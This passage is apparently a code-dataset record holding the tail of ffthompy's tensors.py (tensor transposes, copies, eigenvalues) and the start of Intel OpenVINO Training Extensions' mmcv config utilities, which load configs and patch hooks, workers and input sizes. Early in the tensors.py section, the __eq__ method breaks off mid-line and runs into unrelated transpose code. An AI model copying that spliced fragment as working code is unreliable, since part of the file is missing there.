np.ndindex(*self.shape):\n self.val[di] += mean[di]\n return self\n\n def __eq__(self, x, full=True, tol=1e-10):\n \"\"\"\n Check the equality with other objects comparable to trig. polynomials.\n \"\"\"\n _bool = False\n res = None\n if isinstance(x, Tensor) and self.val.squeeze().shape==x.val.squeeze().shape:\n res = np.linalg.norm(self.val.squeeze()-x.val.squeeze())\n if resji...', self.val)\n elif self.order == 4:\n res.val = np.einsum('ijkl...->klij...', self.val)\n else:\n raise NotImplementedError()\n return res\n\n def transpose_left(self):\n res = self.empty_like(name=self.name+'.T')\n assert(self.order==4)\n res.val = np.einsum('ijkl...->jikl...', self.val)\n return res\n\n def transpose_right(self):\n res = self.empty_like(name=self.name+'.T')\n assert(self.order==4)\n res.val = np.einsum('ijkl...->ijlk...', self.val)\n return res\n\n def vec(self):\n \"\"\"\n Returns one-dimensional vector (column) version of trigonometric\n polynomial.\n \"\"\"\n return np.matrix(self.val.ravel()).transpose()\n\n def copy(self, name=None):\n if name is None:\n name = 'copy of' + self.name\n return Tensor(name=name, val=np.copy(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def zeros_like(self, name=None):\n if name is None:\n name = 'zeros like ' + self.name\n return Tensor(name=name, val=np.zeros_like(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def empty_like(self, name=None):\n if name is None:\n name = 'empty like ' + self.name\n return Tensor(name=name, val=np.empty_like(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def calc_eigs(self, sort=True, symmetric=False, mandel=False):\n if symmetric:\n eigfun = np.linalg.eigvalsh\n else:\n eigfun = np.linalg.eigvals\n\n if self.order == 2:\n eigs = np.zeros(self.shape[-1]+self.N)\n for ind in np.ndindex(self.N):\n mat = self.val[:,:][ind]\n eigs.append(eigfun(mat))\n elif self.order == 4:\n if mandel:\n matrixfun = lambda x: ElasticTensor.create_mandel(x)\n d = self.shape[2]\n eigdim = d*(d+1)/2\n else:\n matshape = (self.shape[0]*self.shape[1], self.shape[2]*self.shape[3])\n matrixfun = lambda x: np.reshape(val[ind], matshape)\n eigdim = self.shape[2]*self.shape[3]\n\n eigs = np.zeros(self.N + (eigdim,))\n val = np.copy(self.val)\n for ii in range(self.dim):\n val = np.rollaxis(val, self.val.ndim-self.dim+ii, ii)\n\n for ind in np.ndindex(*self.N):\n mat = matrixfun(val[ind])\n eigs[ind] = eigfun(mat)\n\n eigs = np.array(eigs)\n if sort:\n eigs = np.sort(eigs, axis=0)\n return eigs\n","sub_path":"ffthompy/tensors.py","file_name":"tensors.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"197504437","text":"\"\"\"Utils for common OTX algorithms.\"\"\"\n\n# Copyright (C) 2022 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions\n# and limitations under the License.\n\nimport copy\nimport glob\nimport multiprocessing\nimport os\nimport os.path as osp\nimport platform\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport warnings\nfrom collections.abc import Mapping\nfrom importlib import import_module\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport torch\nfrom mmcv import Config, ConfigDict\nfrom mmcv.utils.config import BASE_KEY, DEPRECATION_KEY\nfrom mmcv.utils.misc import import_modules_from_strings\nfrom mmcv.utils.path import check_file_exist\n\nfrom otx.algorithms.common.configs.configuration_enums import InputSizePreset\nfrom otx.algorithms.common.utils.logger import get_logger\nfrom otx.api.entities.datasets import DatasetEntity\n\nfrom ._config_utils_get_configs_by_keys import get_configs_by_keys\nfrom ._config_utils_get_configs_by_pairs import get_configs_by_pairs\n\nlogger = get_logger()\n\n\n# TODO: refactor Config\nclass MPAConfig(Config):\n \"\"\"A class that extends the base `Config` class, adds additional functionality for loading configuration files.\"\"\"\n\n @staticmethod\n def _file2dict(\n filename, use_predefined_variables=True\n ): # pylint: disable=too-many-locals, too-many-branches, too-many-statements\n \"\"\"Static method that loads the configuration file and returns a dictionary of its contents.\n\n :param filename: str, the path of the configuration file to be loaded.\n :param use_predefined_variables: bool, a flag indicating whether to substitute predefined variables in the\n configuration file.\n :return: tuple of dictionary and string. Returns a dictionary containing the contents of the configuration file\n and a string representation of the configuration file.\n :raises: IOError if the file type is not supported.\n \"\"\"\n filename = osp.abspath(osp.expanduser(filename))\n check_file_exist(filename)\n extender = osp.splitext(filename)[1]\n if extender not in [\".py\", \".json\", \".yaml\", \".yml\"]:\n raise IOError(\"Only py/yml/yaml/json type are supported now!\")\n\n with tempfile.TemporaryDirectory() as temp_config_dir:\n with tempfile.NamedTemporaryFile(dir=temp_config_dir, suffix=extender) as temp_config_file:\n if platform.system() == \"Windows\":\n temp_config_file.close()\n temp_config_name = osp.basename(temp_config_file.name)\n # Substitute predefined variables\n if use_predefined_variables:\n Config._substitute_predefined_vars(filename, temp_config_file.name)\n else:\n shutil.copyfile(filename, temp_config_file.name)\n # Substitute base variables from placeholders to strings\n base_var_dict = Config._pre_substitute_base_vars(temp_config_file.name, temp_config_file.name)\n if filename.endswith(\".py\"):\n temp_module_name = osp.splitext(temp_config_name)[0]\n sys.path.insert(0, temp_config_dir)\n Config._validate_py_syntax(filename)\n mod = import_module(temp_module_name)\n sys.path.pop(0)\n cfg_dict = {name: value for name, value in mod.__dict__.items() if not name.startswith(\"__\")}\n # delete imported module\n del sys.modules[temp_module_name]\n elif filename.endswith((\".yml\", \".yaml\", \".json\")):\n import mmcv\n\n cfg_dict = mmcv.load(temp_config_file.name)\n\n # check deprecation information\n if DEPRECATION_KEY in cfg_dict:\n deprecation_info = cfg_dict.pop(DEPRECATION_KEY)\n warning_msg = f\"The config file {filename} will be deprecated \" \"in the future.\"\n if \"expected\" in deprecation_info:\n warning_msg += f' Please use {deprecation_info[\"expected\"]} ' \"instead.\"\n if \"reference\" in deprecation_info:\n warning_msg += \" More information can be found at \" f'{deprecation_info[\"reference\"]}'\n warnings.warn(warning_msg)\n\n cfg_text = filename + \"\\n\"\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n # Setting encoding explicitly to resolve coding issue on windows\n cfg_text += f.read()\n\n if BASE_KEY in cfg_dict:\n cfg_dir = osp.dirname(filename)\n base_filename = cfg_dict.pop(BASE_KEY)\n base_filename = base_filename if isinstance(base_filename, list) else [base_filename]\n\n cfg_dict_list = []\n cfg_text_list = []\n for f in base_filename:\n _cfg_dict, _cfg_text = MPAConfig._file2dict(osp.join(cfg_dir, f))\n cfg_dict_list.append(_cfg_dict)\n cfg_text_list.append(_cfg_text)\n\n base_cfg_dict = dict()\n # for c in cfg_dict_list:\n # duplicate_keys = base_cfg_dict.keys() & c.keys()\n # if len(duplicate_keys) > 0:\n # raise KeyError('Duplicate key is not allowed among bases. '\n # f'Duplicate keys: {duplicate_keys}')\n # base_cfg_dict.update(c)\n for c in cfg_dict_list:\n if len(base_cfg_dict.keys() & c.keys()) > 0:\n # raise KeyError(f'Duplicate key is not allowed among bases [{base_cfg_dict.keys() & c.keys()}]')\n logger.warning(f\"Duplicate key is detected among bases [{base_cfg_dict.keys() & c.keys()}]\")\n logger.debug(f\"base = {base_cfg_dict}, cfg = {c}\")\n base_cfg_dict = Config._merge_a_into_b(base_cfg_dict, c)\n logger.debug(f\"merged dict = {base_cfg_dict}\")\n else:\n base_cfg_dict.update(c)\n\n # Subtitute base variables from strings to their actual values\n cfg_dict = Config._substitute_base_vars(cfg_dict, base_var_dict, base_cfg_dict)\n\n base_cfg_dict = Config._merge_a_into_b(cfg_dict, base_cfg_dict)\n cfg_dict = base_cfg_dict\n\n # merge cfg_text\n cfg_text_list.append(cfg_text)\n cfg_text = \"\\n\".join(cfg_text_list)\n\n return cfg_dict, cfg_text\n\n @staticmethod\n def fromfile(filename, use_predefined_variables=True, import_custom_modules=True):\n \"\"\"Static method that loads a configuration file and returns an instance of `Config` class.\n\n :param filename: str, the path of the configuration file to be loaded.\n :param use_predefined_variables: bool, a flag indicating whether to substitute predefined variables in the\n configuration file.\n :param import_custom_modules: bool, a flag indicating whether to import custom modules.\n :return: Config object, an instance of `Config` class containing the contents of the configuration file.\n \"\"\"\n cfg_dict, cfg_text = MPAConfig._file2dict(filename, use_predefined_variables)\n if import_custom_modules and cfg_dict.get(\"custom_imports\", None):\n import_modules_from_strings(**cfg_dict[\"custom_imports\"])\n return MPAConfig(cfg_dict, cfg_text=cfg_text, filename=filename)\n\n @property\n def pretty_text(self):\n \"\"\"Make python file human-readable.\n\n It's almost same as mmcv.Config's code but code to reformat using yapf is removed to reduce time.\n \"\"\"\n\n indent = 4\n\n def _indent(s_, num_spaces):\n s = s_.split(\"\\n\")\n if len(s) == 1:\n return s_\n first = s.pop(0)\n s = [(num_spaces * \" \") + line for line in s]\n s = \"\\n\".join(s)\n s = first + \"\\n\" + s\n return s\n\n def _format_basic_types(k, v, use_mapping=False):\n if isinstance(v, str):\n v_str = f\"'{v}'\"\n else:\n v_str = str(v)\n\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: {v_str}\"\n else:\n attr_str = f\"{str(k)}={v_str}\"\n attr_str = _indent(attr_str, indent)\n\n return attr_str\n\n def _format_list(k, v, use_mapping=False):\n # check if all items in the list are dict\n if all(isinstance(_, dict) for _ in v):\n v_str = \"[\\n\"\n v_str += \"\\n\".join(f\"dict({_indent(_format_dict(v_), indent)}),\" for v_ in v).rstrip(\",\")\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: {v_str}\"\n else:\n attr_str = f\"{str(k)}={v_str}\"\n attr_str = _indent(attr_str, indent) + \"]\"\n else:\n attr_str = _format_basic_types(k, v, use_mapping)\n return attr_str\n\n def _contain_invalid_identifier(dict_str):\n contain_invalid_identifier = False\n for key_name in dict_str:\n contain_invalid_identifier |= not str(key_name).isidentifier()\n return contain_invalid_identifier\n\n def _format_dict(input_dict, outest_level=False):\n r = \"\"\n s = []\n\n use_mapping = _contain_invalid_identifier(input_dict)\n if use_mapping:\n r += \"{\"\n for idx, (k, v) in enumerate(input_dict.items()):\n is_last = idx >= len(input_dict) - 1\n end = \"\" if outest_level or is_last else \",\"\n if isinstance(v, dict):\n v_str = \"\\n\" + _format_dict(v)\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: dict({v_str}\"\n else:\n attr_str = f\"{str(k)}=dict({v_str}\"\n attr_str = _indent(attr_str, indent) + \")\" + end\n elif isinstance(v, list):\n attr_str = _format_list(k, v, use_mapping) + end\n else:\n attr_str = _format_basic_types(k, v, use_mapping) + end\n\n s.append(attr_str)\n r += \"\\n\".join(s)\n if use_mapping:\n r += \"}\"\n return r\n\n cfg_dict = self._cfg_dict.to_dict()\n text = _format_dict(cfg_dict, outest_level=True)\n\n return text\n\n\ndef copy_config(cfg):\n \"\"\"A function that creates a deep copy of the input configuration object.\n\n :param cfg: Config object, an instance of `Config` class to be copied.\n :return: Config object, a deep copy of the input configuration object.\n :raises: ValueError if the input object is not an instance of `Config` class.\n \"\"\"\n if not isinstance(cfg, Config):\n raise ValueError(f\"cannot copy this instance {type(cfg)}\")\n\n # disable [B301, B403] pickle, import-pickle - the library used for converting cfg object\n import pickle # nosec B403\n\n data = pickle.dumps(cfg)\n return pickle.loads(data) # nosec B301\n\n\ndef update_or_add_custom_hook(cfg: Config, hook_cfg: ConfigDict):\n \"\"\"Update hook cfg if same type is in custom_hook or append it.\"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n custom_hooks_updated = False\n for custom_hook in custom_hooks:\n if custom_hook[\"type\"] == hook_cfg[\"type\"]:\n custom_hook.update(hook_cfg)\n custom_hooks_updated = True\n break\n if not custom_hooks_updated:\n custom_hooks.append(hook_cfg)\n cfg[\"custom_hooks\"] = custom_hooks\n\n\ndef remove_custom_hook(cfg: Config, hook_type: str):\n \"\"\"Remove hook cfg if hook_type is in custom_hook.\"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n if len(custom_hooks) > 0:\n idx_to_del = None\n for i, custom_hook in enumerate(custom_hooks):\n if custom_hook[\"type\"] == hook_type:\n idx_to_del = i\n break\n if idx_to_del is not None:\n del custom_hooks[idx_to_del]\n\n\ndef recursively_update_cfg(\n cfg: Union[Config, dict],\n criterion: Callable[[Any, Any], bool],\n update_dict: Any,\n):\n \"\"\"A function that recursively updates the input dictionary or `Config` object with a new dictionary.\n\n :param cfg: Union[Config, dict], an input dictionary or `Config` object to be updated.\n :param criterion: Callable[[Any, Any], bool], a function that determines whether to update a key-value pair based on\n a criterion. The function takes two arguments: key and value, and returns a boolean.\n :param update_dict: Any, a dictionary to be used for updating the input dictionary.\n :return: None\n \"\"\"\n for key, val in list(cfg.items()):\n if isinstance(val, dict):\n recursively_update_cfg(val, criterion, update_dict)\n if criterion(key, val):\n cfg.update(update_dict)\n\n\ndef add_custom_hook_if_not_exists(cfg: Config, hook_cfg: ConfigDict):\n \"\"\"A function that adds a custom hook to the input `Config` object if it doesn't already exist.\n\n :param cfg: Config object, an instance of `Config` class to which the custom hook will be added.\n :param hook_cfg: ConfigDict object, an instance of `ConfigDict` class representing the custom hook to be added.\n :return: None\n \"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n found = False\n for hook in custom_hooks:\n if hook[\"type\"] == hook_cfg[\"type\"]:\n found = True\n break\n if not found:\n custom_hooks.append(hook_cfg)\n cfg[\"custom_hooks\"] = custom_hooks\n\n\ndef remove_from_config(config: Union[Config, ConfigDict], key: str):\n \"\"\"Update & Remove configs.\"\"\"\n if key in config:\n if isinstance(config, Config):\n del config._cfg_dict[key] # pylint: disable=protected-access\n elif isinstance(config, ConfigDict):\n del config[key]\n else:\n raise ValueError(f\"Unknown config type {type(config)}\")\n\n\ndef remove_from_configs_by_type(configs: List[ConfigDict], type_name: str):\n \"\"\"Update & remove by type.\"\"\"\n indices = []\n for i, config in enumerate(configs):\n type_name_ = config.get(\"type\", None)\n if type_name_ == type_name:\n indices.append(i)\n for i in reversed(indices):\n configs.pop(i)\n\n\ndef update_config(\n config: Union[Config, ConfigDict],\n pairs: Dict[Tuple[Any, ...], Any],\n):\n \"\"\"Update configs by path as a key and value as a target.\"\"\"\n for path, value in pairs.items():\n path_ = list(reversed(path))\n ptr = config\n key = None\n while path_:\n key = path_.pop()\n if isinstance(ptr, (Config, Mapping)):\n if key not in ptr:\n ptr[key] = ConfigDict()\n elif isinstance(ptr, (list, tuple)):\n assert isinstance(key, int), f\"{key} of {path} must be int for ({type(ptr)}: {ptr})\"\n assert len(ptr) < key, f\"{key} of {path} exceeds {len(ptr)}\"\n if len(path_) == 0:\n ptr[key] = value\n ptr = ptr[key]\n\n\ndef get_dataset_configs(config: Union[Config, ConfigDict], subset: str) -> List[ConfigDict]:\n \"\"\"A function that retrieves 'datasets' configurations from the input `Config` object or `ConfigDict` object.\n\n :param config: Union[Config, ConfigDict], an instance of `Config` class or `ConfigDict` class containing the\n configurations.\n :param subset: str, a string representing the subset for which the 'datasets' configuration is required.\n :return: List[ConfigDict], a list of 'datasets' configuration dictionaries.\n \"\"\"\n if config.data.get(subset, None) is None:\n return []\n data_cfg = config.data[subset]\n data_cfgs = get_configs_by_keys(data_cfg, [\"dataset\", \"datasets\"])\n return data_cfgs if data_cfgs else [data_cfg]\n\n\ndef prepare_for_testing(config: Union[Config, ConfigDict], dataset: DatasetEntity) -> Config:\n \"\"\"Prepare configs for testing phase.\"\"\"\n config = copy.deepcopy(config)\n # FIXME. Should working directories be modified here?\n config.data.test.otx_dataset = dataset\n return config\n\n\ndef is_epoch_based_runner(runner_config: ConfigDict):\n \"\"\"Check Epoch based or Iter based runner.\"\"\"\n return \"Epoch\" in runner_config.type\n\n\ndef config_from_string(config_string: str) -> Config:\n \"\"\"Generate an mmcv config dict object from a string.\n\n :param config_string: string to parse\n :return config: configuration object\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w\", suffix=\".py\") as temp_file:\n temp_file.write(config_string)\n temp_file.flush()\n return Config.fromfile(temp_file.name)\n\n\ndef patch_data_pipeline(config: Config, data_pipeline: str = \"\"):\n \"\"\"Replace data pipeline to data_pipeline.py if it exist.\"\"\"\n if os.path.isfile(data_pipeline):\n data_pipeline_cfg = Config.fromfile(data_pipeline)\n config.merge_from_dict(data_pipeline_cfg)\n else:\n raise FileNotFoundError(f\"data_pipeline: {data_pipeline} not founded\")\n\n\ndef patch_color_conversion(config: Config):\n \"\"\"Patch color conversion.\"\"\"\n assert \"data\" in config\n\n for cfg in get_configs_by_pairs(config.data, dict(type=\"Normalize\")):\n to_rgb = False\n if \"to_rgb\" in cfg:\n to_rgb = cfg.to_rgb\n cfg.to_rgb = not bool(to_rgb)\n\n\ndef patch_adaptive_interval_training(config: Config):\n \"\"\"Update adaptive interval settings for OTX training.\n\n This function can be removed by adding custom hook cfg into recipe.py directly.\n \"\"\"\n # Add/remove adaptive interval hook\n if config.get(\"use_adaptive_interval\", False):\n update_or_add_custom_hook(\n config,\n ConfigDict(\n {\n \"type\": \"AdaptiveTrainSchedulingHook\",\n \"max_interval\": 5,\n \"enable_adaptive_interval_hook\": True,\n \"enable_eval_before_run\": True,\n **config.pop(\"adaptive_validation_interval\", {}),\n }\n ),\n )\n else:\n config.pop(\"adaptive_validation_interval\", None)\n\n\ndef patch_early_stopping(config: Config):\n \"\"\"Update early stop settings for OTX training.\n\n This function can be removed by adding custom hook cfg into recipe.py directly.\n \"\"\"\n if \"early_stop\" in config:\n remove_custom_hook(config, \"EarlyStoppingHook\")\n early_stop = config.get(\"early_stop\", False)\n if early_stop:\n early_stop_hook = ConfigDict(\n type=\"LazyEarlyStoppingHook\",\n start=early_stop.start,\n patience=early_stop.patience,\n iteration_patience=early_stop.iteration_patience,\n interval=1,\n metric=config.early_stop_metric,\n priority=75,\n )\n update_or_add_custom_hook(config, early_stop_hook)\n else:\n remove_custom_hook(config, \"LazyEarlyStoppingHook\")\n\n # make sure model to be in a training mode even after model is evaluated (mmcv bug)\n update_or_add_custom_hook(\n config,\n ConfigDict(type=\"ForceTrainModeHook\", priority=\"LOWEST\"),\n )\n\n\ndef patch_persistent_workers(config: Config):\n \"\"\"Set persistent_workers as False in some conditions.\n\n persistent_workers is set as 0 in two cases below:\n case 1) num_workers is 0\n case 2) semi-SL with distributed training. Because it uses two data loaders in each processes,\n it makes workers for data loaders unstable, which makes errors during training.\n\n \"\"\"\n dist_semi_sl = \"unlabeled\" in config.data and torch.distributed.is_initialized()\n data_cfg = config.data\n for subset in [\"train\", \"val\", \"test\", \"unlabeled\"]:\n if subset not in data_cfg:\n continue\n dataloader_cfg = data_cfg.get(f\"{subset}_dataloader\", ConfigDict())\n workers_per_gpu = dataloader_cfg.get(\n \"workers_per_gpu\",\n data_cfg.get(\"workers_per_gpu\", 0),\n )\n if workers_per_gpu == 0 or dist_semi_sl:\n dataloader_cfg[\"persistent_workers\"] = False\n elif \"persistent_workers\" not in dataloader_cfg:\n dataloader_cfg[\"persistent_workers\"] = True\n\n if \"pin_memory\" not in dataloader_cfg:\n dataloader_cfg[\"pin_memory\"] = True\n\n data_cfg[f\"{subset}_dataloader\"] = dataloader_cfg\n\n\ndef get_adaptive_num_workers(num_dataloader: int = 1) -> Union[int, None]:\n \"\"\"Measure appropriate num_workers value and return it.\"\"\"\n num_gpus = torch.cuda.device_count()\n if num_gpus == 0:\n logger.warning(\"There is no GPUs. Use existing num_worker value.\")\n return None\n return min(multiprocessing.cpu_count() // (num_dataloader * num_gpus), 8) # max available num_workers is 8\n\n\ndef patch_from_hyperparams(config: Config, hyperparams):\n \"\"\"Patch config parameters from hyperparams.\"\"\"\n params = hyperparams.learning_parameters\n warmup_iters = int(params.learning_rate_warmup_iters)\n\n model_label_type = config.filename.split(\"/\")[-1]\n if \"multilabel\" in model_label_type:\n lr_config = ConfigDict(max_lr=params.learning_rate, warmup=None)\n else:\n lr_config = (\n ConfigDict(warmup_iters=warmup_iters)\n if warmup_iters > 0\n else ConfigDict(warmup_iters=warmup_iters, warmup=None)\n )\n\n if params.enable_early_stopping and config.get(\"evaluation\", None):\n early_stop = ConfigDict(\n start=int(params.early_stop_start),\n patience=int(params.early_stop_patience),\n iteration_patience=int(params.early_stop_iteration_patience),\n )\n else:\n early_stop = False\n\n runner = ConfigDict(max_epochs=int(params.num_iters))\n if config.get(\"runner\", None) and config.runner.get(\"type\").startswith(\"IterBasedRunner\"):\n runner = ConfigDict(max_iters=int(params.num_iters))\n\n hparams = ConfigDict(\n optimizer=ConfigDict(lr=params.learning_rate),\n lr_config=lr_config,\n early_stop=early_stop,\n data=ConfigDict(\n samples_per_gpu=int(params.batch_size),\n workers_per_gpu=int(params.num_workers),\n ),\n runner=runner,\n )\n\n # NOTE: Not all algorithms are compatible with the parameter `inference_batch_size`,\n # as `samples_per_gpu might` not be a valid argument for certain algorithms.\n if hasattr(config, \"task\"):\n if config.task == \"instance-segmentation\" or config.task == \"detection\":\n hparams.update(\n ConfigDict(\n data=ConfigDict(\n val_dataloader=ConfigDict(samples_per_gpu=int(params.inference_batch_size)),\n test_dataloader=ConfigDict(samples_per_gpu=int(params.inference_batch_size)),\n ),\n )\n )\n is_semi_sl = hyperparams.algo_backend.train_type.name == \"Semisupervised\"\n\n if hyperparams.learning_parameters.auto_num_workers:\n adapted_num_worker = get_adaptive_num_workers(2 if is_semi_sl else 1)\n if adapted_num_worker is not None:\n hparams.data.workers_per_gpu = adapted_num_worker\n\n if is_semi_sl:\n unlabeled_config = ConfigDict(\n data=ConfigDict(\n unlabeled_dataloader=ConfigDict(\n samples_per_gpu=int(params.unlabeled_batch_size),\n workers_per_gpu=int(params.num_workers),\n )\n )\n )\n config.update(unlabeled_config)\n\n hparams[\"use_adaptive_interval\"] = hyperparams.learning_parameters.use_adaptive_interval\n config.merge_from_dict(hparams)\n\n\nDEFAULT_META_KEYS = (\n \"filename\",\n \"ori_filename\",\n \"ori_shape\",\n \"img_shape\",\n \"pad_shape\",\n \"scale_factor\",\n \"flip\",\n \"flip_direction\",\n \"img_norm_cfg\",\n)\n\n\ndef get_meta_keys(pipeline_step, add_meta_keys: List[str] = []):\n \"\"\"Update meta_keys for ignore_labels.\"\"\"\n meta_keys = list(pipeline_step.get(\"meta_keys\", DEFAULT_META_KEYS))\n meta_keys.append(\"ignored_labels\")\n meta_keys += add_meta_keys\n pipeline_step[\"meta_keys\"] = set(meta_keys)\n return pipeline_step\n\n\ndef prepare_work_dir(config: Union[Config, ConfigDict]) -> str:\n \"\"\"Prepare configs of working directory.\"\"\"\n base_work_dir = config.work_dir\n checkpoint_dirs = glob.glob(os.path.join(base_work_dir, \"checkpoints_round_*\"))\n train_round_checkpoint_dir = os.path.join(base_work_dir, f\"checkpoints_round_{len(checkpoint_dirs)}\")\n os.makedirs(train_round_checkpoint_dir)\n config.work_dir = train_round_checkpoint_dir\n if \"meta\" not in config.runner:\n config.runner.meta = ConfigDict()\n config.runner.meta.exp_name = f\"train_round_{len(checkpoint_dirs)}\"\n return train_round_checkpoint_dir\n\n\ndef get_data_cfg(config: Union[Config, ConfigDict], subset: str = \"train\") -> Config:\n \"\"\"Return dataset configs.\"\"\"\n data_cfg = config.data[subset]\n while \"dataset\" in data_cfg:\n data_cfg = data_cfg.dataset\n return data_cfg\n\n\nclass InputSizeManager:\n \"\"\"Class for changing input size and getting input size value by checking data pipeline.\n\n NOTE: \"resize\", \"pad\", \"crop\", \"mosaic\", \"randomaffine\", \"multiscaleflipaug\" , \"AutoAugment\" and \"TwoCropTransform\"\n are considered at now. If other data pipelines exist, it can work differently than expected.\n\n Args:\n data_config (Dict): Data configuration expected to have \"train\", \"val\" or \"test\" data pipeline.\n base_input_size (Optional[Union[int, List[int], Dict[str, Union[int, List[int]]]]], optional):\n Default input size. If it's a None, it's estimated based on data pipeline. If it's an integer,\n it's expected that all data pipeline have (base_input_size x base_input_size) input size.\n If it's an integer list, all data pipeline have same (base_input_size[0] x base_input_size[1]) input size.\n If it's dictionary, each data pipeline has specified input size. It should have format as below:\n {\"train\" : [w, h], \"val\" : [w, h], \"test\" : [w, h]}\n \"\"\"\n\n PIPELINE_TO_CHANGE: Dict[str, List[str]] = {\n \"resize\": [\"size\", \"img_scale\"],\n \"pad\": [\"size\"],\n \"crop\": [\"crop_size\"],\n \"mosaic\": [\"img_scale\"],\n \"randomaffine\": [\"border\"],\n \"multiscaleflipaug\": [\"img_scale\"],\n }\n PIPELINE_WRAPPER: Dict[str, List[str]] = {\n \"MultiScaleFlipAug\": [\"transforms\"],\n \"AutoAugment\": [\"policies\"],\n \"TwoCropTransform\": [\"view0\", \"view1\", \"pipeline\"],\n \"LoadResizeDataFromOTXDataset\": [\"resize_cfg\"],\n }\n SUBSET_TYPES: Tuple[str, str, str, str] = (\"train\", \"val\", \"test\", \"unlabeled\")\n\n def __init__(\n self,\n data_config: Dict,\n base_input_size: Optional[Union[int, Tuple[int, int], Dict[str, int], Dict[str, Tuple[int, int]]]] = None,\n ):\n self._data_config = data_config\n if isinstance(base_input_size, int):\n base_input_size = (base_input_size, base_input_size)\n elif isinstance(base_input_size, dict):\n for task in base_input_size.keys():\n if isinstance(base_input_size[task], int):\n base_input_size[task] = (base_input_size[task], base_input_size[task]) # type: ignore[assignment]\n for subset_type in self.SUBSET_TYPES:\n if subset_type in data_config and subset_type not in base_input_size:\n raise ValueError(\n f\"There is {subset_type} data configuration but base input size for it doesn't exists.\"\n )\n\n self._base_input_size = base_input_size\n\n def set_input_size(self, input_size: Union[int, List[int], Tuple[int, int]]):\n \"\"\"Set input size in data pipe line.\n\n Args:\n input_size (Union[int, List[int]]):\n input size to set. If it's an integer, (input_size x input_size) will be set.\n If input_size is an integer list, (input_size[0] x input_size[1]) will be set.\n \"\"\"\n if isinstance(input_size, int):\n input_size = [input_size, input_size]\n if not isinstance(self.base_input_size, dict):\n resize_ratio = (input_size[0] / self.base_input_size[0], input_size[1] / self.base_input_size[1])\n\n # scale size values\n for subset_type in self.SUBSET_TYPES:\n if subset_type in self._data_config:\n if isinstance(self.base_input_size, dict):\n resize_ratio = (\n input_size[0] / self.base_input_size[subset_type][0],\n input_size[1] / self.base_input_size[subset_type][1],\n )\n pipelines = self._get_pipelines(subset_type)\n for pipeline in pipelines:\n self._set_pipeline_size_value(pipeline, resize_ratio)\n\n @property\n def base_input_size(self) -> Union[Tuple[int, int], Dict[str, Tuple[int, int]]]:\n \"\"\"Getter function of `base_input_size` attirbute.\n\n If it isn't set when intializing class, it's estimated by checking data pipeline.\n Same value is returned after estimation.\n\n Raises:\n RuntimeError: If failed to estimate base input size from data pipeline, raise an error.\n\n Returns:\n Union[List[int], Dict[str, List[int]]]: Base input size.\n \"\"\"\n if self._base_input_size is not None:\n return self._base_input_size # type: ignore[return-value]\n\n input_size = self.get_input_size_from_cfg()\n if input_size is None:\n raise RuntimeError(\"There isn't any pipeline in the data configurations.\")\n\n self._base_input_size = input_size\n return input_size\n\n def get_input_size_from_cfg(\n self, subset: Union[str, List[str]] = [\"test\", \"val\", \"train\"]\n ) -> Union[None, Tuple[int, int]]:\n \"\"\"Estimate image size using data pipeline.\n\n Args:\n subset (Union[str, List[str]], optional): Which pipelines to check. Defaults to [\"test\", \"val\", \"train\"].\n\n Returns:\n Union[None, List[int]]: Return estimiated input size. If failed to estimate, return None.\n \"\"\"\n if isinstance(subset, str):\n subset = [subset]\n\n for target_subset in subset:\n if target_subset in self._data_config:\n input_size = self._estimate_post_img_size(self._data_config[target_subset][\"pipeline\"])\n if input_size is not None:\n return tuple(input_size) # type: ignore[return-value]\n\n return None\n\n def _estimate_post_img_size(\n self, pipelines: List[Dict], default_size: Optional[List[int]] = None\n ) -> Union[List[int], None]:\n # NOTE: Mosaic isn't considered in this step because Mosaic and following RandomAffine don't change image size\n post_img_size = default_size\n for pipeline in pipelines:\n if \"resize\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"resize\")\n if img_size is not None:\n post_img_size = img_size\n elif \"pad\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"pad\")\n if img_size is not None:\n if post_img_size is None:\n post_img_size = img_size\n else:\n for i in range(2):\n if post_img_size[i] < img_size[i]:\n post_img_size[i] = img_size[i]\n elif \"crop\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"crop\")\n if img_size is not None:\n if post_img_size is None:\n post_img_size = img_size\n else:\n for i in range(2):\n if post_img_size[i] > img_size[i]:\n post_img_size[i] = img_size[i]\n elif pipeline[\"type\"] == \"MultiScaleFlipAug\":\n img_size = self._get_size_value(pipeline, \"multiscaleflipaug\")\n if img_size is not None:\n post_img_size = img_size\n\n for pipeline_name, sub_pipeline_names in self.PIPELINE_WRAPPER.items():\n if pipeline_name == pipeline[\"type\"]:\n for sub_pipeline_name in sub_pipeline_names:\n if sub_pipeline_name in pipeline:\n sub_pipeline = pipeline[sub_pipeline_name]\n if isinstance(sub_pipeline, dict):\n sub_pipeline = [sub_pipeline]\n elif isinstance(sub_pipeline[0], list):\n sub_pipeline = sub_pipeline[0]\n post_img_size = self._estimate_post_img_size(sub_pipeline, post_img_size)\n break\n\n return post_img_size\n\n @classmethod\n def _get_size_value(cls, pipeline: Dict, attr: str) -> Union[List[int], None]:\n for pipeline_attr in cls.PIPELINE_TO_CHANGE[attr]:\n if pipeline_attr not in 